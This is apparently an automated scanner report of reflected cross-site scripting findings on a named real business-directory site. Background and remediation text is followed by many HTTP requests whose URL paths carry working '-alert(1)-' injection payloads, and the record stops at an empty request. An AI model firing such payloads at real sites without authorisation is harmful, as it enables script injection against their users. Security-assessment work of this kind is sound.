Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssf7342"-alert(1)-"107199becab/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1c09"-alert(1)-"6f31add0046 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.cssf1c09"-alert(1)-"6f31add0046 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"96068b15aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
